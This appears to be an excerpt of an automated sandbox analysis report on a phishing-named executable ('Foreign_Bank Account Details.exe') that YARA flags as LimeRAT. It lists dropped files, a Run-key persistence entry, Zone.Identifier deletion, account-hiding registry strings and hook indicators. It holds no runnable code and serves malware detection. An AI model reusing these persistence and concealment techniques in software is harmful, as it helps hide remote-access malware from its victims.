Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ms-MY\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ug-CN\mpuxagent.dll.mui Jump to dropped file

Boot Survival:

barindex
Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tKZVPq Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tKZVPq Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CEB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 42_2_00007FF650CEB0C8

Hooking and other Techniques for Hiding and Protection:

barindex
May modify the system service descriptor table (often done to hook functions)
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to hide user accounts
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: \microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\*>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\*>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\*(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\*/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\*>HKLM\Software\Microsoft\Windows Defender Security Center\*\\*-HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*
Stores large binary data to the registry
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Key value created or modified: HKEY_USERSS-1-5-20\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Jump to behavior
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
